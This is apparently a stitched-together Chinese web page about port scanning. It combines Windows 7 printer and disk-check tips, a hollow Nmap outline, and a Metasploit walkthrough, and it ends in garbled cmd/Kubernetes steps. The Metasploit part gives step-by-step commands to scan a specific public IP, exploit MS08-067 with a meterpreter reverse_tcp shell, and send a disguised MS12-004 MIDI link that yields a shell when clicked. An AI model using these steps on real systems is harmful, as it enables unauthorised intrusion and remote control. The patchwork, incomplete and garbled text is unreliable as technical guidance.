端口扫描方法_端口扫描流程

windows7怎么扫描端口

　最近有位win7系统用户反映，打印机安装完成之后，打印时却发现打印机不能够正常打印了，这让用户很是苦恼，其实出现这个问题是因为在安装过程中端口选择不正确导致的，那么win7系统怎么设置打印机端口呢?今天为大家分享win7系统打印机端口设置方法。

打印机端口设置方法介绍：

1、点击左下方的“开始”，找到“设备和打印机”，单击打开;如图所示：

2、在弹出的窗口中，找到要更改端口的打印机名称，在打印机图标上右击，选择“打印机属性”;如图所示：

3、新弹出的对话框中，找到如图所示的“端口”;如图所示：

4、然后在下面选择自己需要更改的端口，现在普通的打印机，大多是USB接口的，一般只需更改不同的USB接口选项即可。

　我们在使用电脑的时候，经常都会对文件进行读取与删除操作，从而使硬盘簇变得混乱，有时候会出现一些文件丢失的情况，如果我们可以善于使用系统自带的磁盘扫描功能，就可以恢复丢失的文件与磁盘空间，那么win7系统怎么使用磁盘扫描功能呢?今天为大家分享win7系统使用磁盘扫描功能的操作方法。

使用磁盘扫描功能操作方法：

1、双击桌面上的“计算机”图标，打开“计算机”窗口;如图所示：

2、右击要进行磁盘扫描的驱动器图标，如D盘，在弹出的快捷菜单中选择“属性”命令;如图所示：

3、打开“本地磁盘(D：)属性”对话框，选择“工具”选项卡，在“查错”栏中单击‘开始;如图所示：

4、在打开DE “检查磁盘本地磁盘(D：)”对话框中，选中‘自动修复文件系统错误’和‘扫描并试图恢复坏扇区’复选框，然后单击‘开始’按钮，系统即开始检查磁盘中的错误;如图所示：

5、检查完毕后，打开提示磁盘检查完成对话框，单击‘确定’按钮即可。

Nmap 扫描原理及使用方法

Nmap 扫描原理及使用方法

Namp包含四项基本功能

Nmap基本扫描方法

2.1 用法引入

2.1.1确定端口状况

确定目标主机在线情况及端口基本状况。

命令形式：

namp targethost

2.1.2 完整全面的扫描

对主机进行完整全面的扫描，那么可以使用nmap内置的-A选项。使用该选项，nmap 对主机进行主机发现、端口扫描、应用程序与版本侦测、操作系统侦测及调用默认NSE脚本扫描。

1）命令形式：

nmap -T4 -A -v targethost

2）参数详解：

2.2 主机发现

2.2.1 主机发现原理

主机发现发现的原理与Ping命令类似，发送探测包到目标主机，如果收到回复，说明目标主机是开启的。

1）常见主机探测方式：

2）案例：

Nmap的用户位于源端，IP地址192.168.0.5，向目标主机192.168.0.3发送ICMP Echo Request。如果该请求报文没有被防火墙拦截掉，那么目标机会回复ICMP Echo Reply包回来。以此来确定目标主机是否在线。

3）默认情况下：Nmap会发送四种不同类型的数据包来探测目标主机是否在线。

依次发送四个报文探测目标机是否开启。只要收到其中一个包的回复，那就证明目标机开启。使用四种不同类型的数据包可以避免因防火墙或丢包造成的判断错误。

2.2.2 主机发现的用法

2.3 端口扫描

Namp通过探测将端口划分为6个状态：

2.3.1 端口扫描原理

2.3.1.1 TCP SYN scanning

TCP SYN scanning 是Nmap默认的扫描方式，称作半开放扫描。

原理：该方式发送SYN到目标端口。

2.3.1.2 TCP connect scanning

原理：TCP connect 方式使用系统网络API connect 向目标主机的端口发起连接。

优缺点：该方式扫描速度比较慢，而且由于建立完整的TCP连接会在目标机上留下记录信息，不够隐蔽。所以，TCP connect是TCP SYN无法使用才考虑选择的方式。

2.3.1.3 TCP ACK scanning

原理：向目标主机的端口发送ACK包。

优缺点：该方式只能用于确定防火墙是否屏蔽某个端口，可以辅助TCP SYN的方式来判断目标主机防火墙的状况。

2.3.1.4 TCP FIN/Xmas/NULL scanning

这三种扫描方式被称为秘密扫描（Stealthy Scan）

原理：FIN扫描向目标主机的端口发送的TCP FIN包或Xmas tree包/Null包

其中Xmas tree包是指flags中FIN URG PUSH被置为1的TCP包；NULL包是指所有flags都为0的TCP包。

2.3.1.5 UDP scanning

UDP扫描方式用于判断UDP端口的情况。

原理：向目标主机的UDP端口发送探测包。

2.3.2 端口扫描用法

2.3.2.1 扫描方式选项

2.3.2.2 端口参数与扫描顺序

2.4 版本侦测

2.4.1 优缺点

2.4.2 版本侦测原理

2.4.3 版本侦测用法

2.5 OS侦测

2.5.1 OS侦测原理

2.5.2 OS侦测用法

参考：

如何用Metasploit扫描端口

一、调用Nmap进行扫描

进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)

二、MSF模块扫描

Use auxiliary/scanner/postscan/syn

先用搜索命令搜索有关端口扫描的工具：searchportscan

我们使用Use auxiliary/scanner/postscan/syn

看一下参数配置 showoptions

我们先来设置一下网卡

Set INTERFACE eth0

设置一下扫描的端口，我们这里来扫描80：set PORTS 80

设置扫描目标RHOSTS ：set RHOSTS 119.63.37.149

在设置一下线程：set THREADS 100

看一下我们设置好的

这时候我们都设置好了，我们来攻击下，看看效果，用命令run进行攻击

缺点就是扫描的速度有点慢啊

MetaSploit SMB扫描获取系统信息

还是搜索一下smb：searchsmb

这次发现搜出来很多，我们用这个模块

Use auxiliary/scanner/smb/smb_version

看一下需要设置的参数

设定目标ip：set RHOSTS 192.168.188.140

在设置一下线程：set THREAD 10

然后run一下，查看结果

直接扫描出来小伙伴的系统还有主机名，速度不到1s，很快

也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200

MetaSploit服务识别

我们这里对SSH和FTP进行识别

在这里使用这个模块：use auxiliary/scanner/ssh/ssh_version

然后我们设置一下参数，这里讲设置好的参数截图看一下

Run一下看看结果，其实没有扫出来，好像是屏蔽了，但是用nmap却扫出来了ssh

在试一下ftp，用这个模块：use auxiliary/scanner/ftp/ftp_version

设置下参数

可以看到结果，也没有扫描出来；

MetaSploit SNMP扫描与枚举

搜索一下snmpuse auxiliary/scanner/snmp/snmp_login

看一下他的参数设置

这个参数还是很多的

设定一下目标

然后在run一下

枚举用这个模块

use auxiliary/scanner/snmp/snmp_enum

设置好目标和线程后run一下就可以

MetaSploit远程代码执行

搜索一下08-067，使用这个攻击载荷

use exploit/windows/smb/ms08_067_netapi

同样来看一下参数设置

我们只要设置一下目标就可以，然后我们需要一个载荷来反弹shell

set payload windows/meterpreter/reverse_tcp

然后设置参数

将LHOST 设置为自己的ip（对外攻击不要忘了段口转发）

比如说知道对面的系统是什么版本，可以指定targer，用target查看一下都有什么版本

设置一下目标，假设我们目标机器的系统为10：set target 10

这时候，我们再来看一下其参数设置，发现比以前完备了好多

08-067是不会自动识别系统版本的，但是其他的可以自动识别，所以用其他攻击载荷的时候可以不用设置

然后输入exploit进行攻击即可

这时候会出来一个meterpreter

我们在里面输入shell，就会反弹一个shell

这样整个攻击过程就完成了

MetaSploit MIDI文件解析远程代码执行

还是来搜索12-004

设置下本机ip set SRVHOST ip

然后攻击

会生成一个连接，但是这个链接容易让人发现，所以我们可以伪装下ip利用URIPATH参数就可以伪装

在设置时，会发现报红，因为4444端口被占用了，所以我们改下监听端口 set LPORT 5555

然后生成连接

只要目标点了这个链接，那么我们就会上线一个shell

说一下，目标点击后我们这边并没有反映，我们需要输下session查看当前会话，会找到上线的机子，连接上线的机子

Session –I 1（id）

然后输入shell就可以拿到shell

简述端口扫描原理

扫描器通过选用远程TCPIP不同的端口的服务，并记录目标给予的回答，通过这种方法可以搜集到很多关于目标主机的各种有用的信息；

指发送一组端口扫描消息，试图以此侵入某台计算机，并了解其提供的计算机网络服务类型。端口扫描是计算机解密高手喜欢的一种方式，攻击者可以发现可探寻到的攻击弱点。实质上端口扫描包括向每个端口发送消息，一次只发送一个消息，接收到的回应类型表示是否在使用该端口并且可由此探寻弱点；

扫描器是一种自动检测远程或本地主机安全性弱点的程序，通过使用扫描器你可以不留痕迹的发现远程服务器的各种TCP端口的分配及提供的服务和软件版本，这就能间接的或直观的发现到远程主机所存在的安全问题。

端口扫描器使用教程

端口扫描器一个端口扫描器，能够扫描出你的电脑或者IP和某一个网站的端口是否被占用，可以扫描哪些端口是开放的，可以自定义IP或网址，自定义开始端口，结束端口进行扫描，工具多线程运行，扫描速度非常快，用来测试端口扫描是方便了。

如果你要查询80是否被占用?

你只需要在开始端口和结束端口输入：80即可!

你也可以输入1-9999进行扫描!

软件名称：

端口扫描器

v1.0

绿色版

软件大小：540KB下载地址：

cmd扫描多个端口命令

1、cmd进行端口扫描，如果界面输入的地址没有被使用的，不支持windows跳线。

2、添加节点标签以K8scaler容器的形式添加Task。

3、Manager会自动创建，Manager每天自动添加节点。